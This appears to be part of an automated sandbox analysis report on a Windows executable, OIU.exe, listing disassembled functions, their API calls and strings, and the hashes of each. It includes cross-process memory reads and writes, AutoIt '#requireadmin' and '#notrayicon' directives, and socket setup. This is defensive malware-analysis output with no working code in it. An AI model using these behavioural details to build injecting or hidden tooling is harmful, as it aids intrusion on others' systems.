                                                                        • Part of subcall function 00BC0242: EnterCriticalSection.KERNEL32( =,00C71884,?,?,00BB198B,00C72518,?,?,?,00BA12F9,00000000), ref: 00BC024D
                                                                        • Part of subcall function 00BC0242: LeaveCriticalSection.KERNEL32( =,?,00BB198B,00C72518,?,?,?,00BA12F9,00000000), ref: 00BC028A
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                        • Part of subcall function 00BC00A3: __onexit.LIBCMT ref: 00BC00A9
                                                                      • __Init_thread_footer.LIBCMT ref: 00C27BFB
                                                                        • Part of subcall function 00BC01F8: EnterCriticalSection.KERNEL32( =,?,?,00BB8747,00C72514), ref: 00BC0202
                                                                        • Part of subcall function 00BC01F8: LeaveCriticalSection.KERNEL32( =,?,00BB8747,00C72514), ref: 00BC0235
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                                      • API String ID: 535116098-3733170431
                                                                      • Opcode ID: d58f60b487baf2019f63a4d6fc6583a620e5d6bd6b9ed954c22594186c14d39e
                                                                      • Instruction ID: 6eaae023dc6b296db55037e3ea1a54a0f9e60bc263cd9c478618dd433ee2d552
                                                                      • Opcode Fuzzy Hash: d58f60b487baf2019f63a4d6fc6583a620e5d6bd6b9ed954c22594186c14d39e
                                                                      • Instruction Fuzzy Hash: CB918A70A04219EFCB14EF94E8D19BDB7B1FF49300F108199F816AB6A2DB71AE41DB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C02716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C0B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C021D0,?,?,00000034,00000800,?,00000034), ref: 00C0B42D
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C02760
                                                                        • Part of subcall function 00C0B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C0B3F8
                                                                        • Part of subcall function 00C0B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00C0B355
                                                                        • Part of subcall function 00C0B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C02194,00000034,?,?,00001004,00000000,00000000), ref: 00C0B365
                                                                        • Part of subcall function 00C0B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C02194,00000034,?,?,00001004,00000000,00000000), ref: 00C0B37B
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C027CD
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C0281A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 05149301e5923c0218c3e1a930707fc610bfbcedfab1b74582822b790317ced0
                                                                      • Instruction ID: e2a8df74d1264c4c9f20b45999cbe21c5d23a7c7b93a581ef63facd8a462fb00
                                                                      • Opcode Fuzzy Hash: 05149301e5923c0218c3e1a930707fc610bfbcedfab1b74582822b790317ced0
                                                                      • Instruction Fuzzy Hash: 34411B76900218AFDB10DFA4CD86BEEBBB8AF09700F108095FA55B7191DB706F45DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\OIU.exe,00000104), ref: 00BD1769
                                                                      • _free.LIBCMT ref: 00BD1834
                                                                      • _free.LIBCMT ref: 00BD183E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Users\user\AppData\Roaming\OIU.exe
                                                                      • API String ID: 2506810119-1393054790
                                                                      • Opcode ID: 6cba27b6e1d8816f2ca005c59ae4356f0de8f0a8233444185749030fcbd6e5be
                                                                      • Instruction ID: 00b63d2289d0ec3b913b9b03172150365ea773c9383adc7f4e35c402db33addb
                                                                      • Opcode Fuzzy Hash: 6cba27b6e1d8816f2ca005c59ae4356f0de8f0a8233444185749030fcbd6e5be
                                                                      • Instruction Fuzzy Hash: A1319CB5A00248BBDB21DB9D9885E9EFBFCEB85310B1445E7F80497321E6708E80DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: 0
                                                                      • API String ID: 135850232-4108050209
                                                                      • Opcode ID: d04f42c04cd5929287a23ee1f4115a2de681169ce16dfe64838f2ae557229ce5
                                                                      • Instruction ID: fdfa5f3334d085cd5b069189f1f650456f77e8ad39ca2ae8047e27b74cfaa86b
                                                                      • Opcode Fuzzy Hash: d04f42c04cd5929287a23ee1f4115a2de681169ce16dfe64838f2ae557229ce5
                                                                      • Instruction Fuzzy Hash: F1417C312143019FDB20DF25D8C4B9EBBE4AB85320F148B5EF9A5972E1D730EA04DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C34416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C344AA
                                                                      • GetWindowLongW.USER32 ref: 00C344C7
                                                                      • SetWindowLongW.USER32 ref: 00C344D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: dbe4d67f5998f918d1105d9fb7bd04e6d471441017d679d358c383a2a8e963fc
                                                                      • Instruction ID: 6a5b270b58ab4e2663549b3b1e6c47aa9ce1201763999c9517ab0dc35f90e8b7
                                                                      • Opcode Fuzzy Hash: dbe4d67f5998f918d1105d9fb7bd04e6d471441017d679d358c383a2a8e963fc
                                                                      • Instruction Fuzzy Hash: BA318B32220205AFDB249E38DC85BEA7BA9EB09334F204725F979E21E0D770ED509B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C2335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C23077,?,?), ref: 00C23378
                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
                                                                      • _wcslen.LIBCMT ref: 00C2309B
                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00C23106
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                      • String ID: 255.255.255.255
                                                                      • API String ID: 946324512-2422070025
                                                                      • Opcode ID: 331a431b93b247596c551ddac7e9eed140ab169b56fc607aa9faf29cb7cb803d
                                                                      • Instruction ID: 4098ebcfba9ccdc37f1c3695bcc2bb377ec2a0ced45a6302347ca9f3c9c07069
                                                                      • Opcode Fuzzy Hash: 331a431b93b247596c551ddac7e9eed140ab169b56fc607aa9faf29cb7cb803d
                                                                      • Instruction Fuzzy Hash: 7431E4352042A19FCB10CF68D485FA977E0EF54318F248099E8258BB92CB79DF41C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C34653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C34705
                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C34713
                                                                      • DestroyWindow.USER32 ref: 00C3471A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyWindow
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 4014797782-2298589950
                                                                      • Opcode ID: e9dd0a124faf54cdd79805f33bcd5ded5f451ced5822efc2a68a74c70c4d6fbb
                                                                      • Instruction ID: 9ae51823dabf94eee500964f8eb16bc3e2515e1b8795ae1c3cb4a3194380a4ff
                                                                      • Opcode Fuzzy Hash: e9dd0a124faf54cdd79805f33bcd5ded5f451ced5822efc2a68a74c70c4d6fbb
                                                                      • Instruction Fuzzy Hash: FB215CB5610208AFDB14DF68DCD1EAB37ADEB5A3A4B040059FA149B291CB70FD51CA60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C095AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 176396367-2734436370
                                                                      • Opcode ID: 251458b8635a2b69b3e2f71d0cfdfec197eac90a0808d7c5b498fc490a270542
                                                                      • Instruction ID: ef4fe21b12cf4fc87903da8a633e737f738678e5b29aba922b1daeb99915007f
                                                                      • Opcode Fuzzy Hash: 251458b8635a2b69b3e2f71d0cfdfec197eac90a0808d7c5b498fc490a270542
                                                                      • Instruction Fuzzy Hash: 2D212B72208511A7D731BB299C02FB773D8DF55310F14442AF959971C3EBB29E41D2D5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C337B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C33840
                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C33850
                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00C33876
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MoveWindow
                                                                      • String ID: Listbox
                                                                      • API String ID: 3315199576-2633736733
                                                                      • Opcode ID: 663084757383357f7672f216179744eab3d5ffd790660410bb8be62a0d1c101c
                                                                      • Instruction ID: 5e6e4831bd33944cce6628fc16a0b50c54dfd4668558bc5abaaf25e16aab5c33
                                                                      • Opcode Fuzzy Hash: 663084757383357f7672f216179744eab3d5ffd790660410bb8be62a0d1c101c
                                                                      • Instruction Fuzzy Hash: F421CF72620218BBEF218F54CC85FBF376EEF8A764F118125FA149B190C671DD528BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C149F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C14A08
                                                                      • GetVolumeInformationW.KERNEL32 ref: 00C14A5C
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00C3CC08), ref: 00C14AD0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: %lu
                                                                      • API String ID: 2507767853-685833217
                                                                      • Opcode ID: a7bf450651168278c408253d37933115a443018dbb2ee250994358b2d379398e
                                                                      • Instruction ID: 2272b1026f7e20fcf683b5f03194e8c16eced6a656ebdbe8204faf4e49850ba0
                                                                      • Opcode Fuzzy Hash: a7bf450651168278c408253d37933115a443018dbb2ee250994358b2d379398e
                                                                      • Instruction Fuzzy Hash: 70319175A00109AFDB10DF54C881EAE7BF8EF09308F1480A5F909EB252D771EE45DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C341EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C3424F
                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C34264
                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C34271
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 3850602802-1010561917
                                                                      • Opcode ID: cbd858fbd2eaa24ac50818df3775eaea653e1b72237b6adcc4de7fca7c92f9b7
                                                                      • Instruction ID: 9e814899e714897025e89921477b00a6a0d3dfa114b063c9e283c74935c8c42d
                                                                      • Opcode Fuzzy Hash: cbd858fbd2eaa24ac50818df3775eaea653e1b72237b6adcc4de7fca7c92f9b7
                                                                      • Instruction Fuzzy Hash: CB11C671250248BFEF205F69CC46FAB3BACEF95B54F110524FA55E60A0D672EC519B10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C02F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                        • Part of subcall function 00C02DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C02DC5
                                                                        • Part of subcall function 00C02DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C02DD6
                                                                        • Part of subcall function 00C02DA7: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00C02DDD
                                                                        • Part of subcall function 00C02DA7: AttachThreadInput.USER32(00000000,?,00000000), ref: 00C02DE4
                                                                      • GetFocus.USER32 ref: 00C02F78
                                                                        • Part of subcall function 00C02DEE: GetParent.USER32(00000000), ref: 00C02DF9
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C02FC3
                                                                      • EnumChildWindows.USER32 ref: 00C02FEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                      • String ID: %s%d
                                                                      • API String ID: 1272988791-1110647743
                                                                      • Opcode ID: eec4165bb7ae141b7d65f1d4dd3a49746c7a807b852d9c6a380d478e29bac77f
                                                                      • Instruction ID: b4b8ecb6d6a6aa27dd643aed4bba8b6e797467d2c396abcb1e52b458dd443ce4
                                                                      • Opcode Fuzzy Hash: eec4165bb7ae141b7d65f1d4dd3a49746c7a807b852d9c6a380d478e29bac77f
                                                                      • Instruction Fuzzy Hash: 0C1172716002056BCF157F649CCAFED77AAAF95304F044075BA09AB192DE709A45DB70
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C35882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$InfoItem$Draw
                                                                      • String ID: 0
                                                                      • API String ID: 3227129158-4108050209
                                                                      • Opcode ID: 5e3c253e9910894584ea22bec9a93081a51a5a58d43f25319acae596e5e1b2df
                                                                      • Instruction ID: 30e101c444470bae442b3506fbc3b6b9aa4b6d27a737faba03fcee13a4a619f5
                                                                      • Opcode Fuzzy Hash: 5e3c253e9910894584ea22bec9a93081a51a5a58d43f25319acae596e5e1b2df
                                                                      • Instruction Fuzzy Hash: 18016972520218EFDB219F21DC44BFEBBB4FB45360F1080A9E849E6151DB708A95EF21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC0242 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32( =,00C71884,?,?,00BB198B,00C72518,?,?,?,00BA12F9,00000000), ref: 00BC024D
                                                                      • LeaveCriticalSection.KERNEL32( =,?,00BB198B,00C72518,?,?,?,00BA12F9,00000000), ref: 00BC028A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID: =
                                                                      • API String ID: 3168844106-1905332926
